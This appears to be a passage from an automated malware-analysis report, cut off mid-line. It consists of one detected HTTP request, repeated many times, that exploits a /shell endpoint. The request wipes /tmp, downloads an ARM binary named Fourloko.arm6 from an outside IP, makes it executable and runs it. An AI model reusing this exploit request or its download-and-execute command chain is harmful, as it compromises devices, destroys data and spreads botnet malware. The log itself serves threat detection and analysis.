              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Conne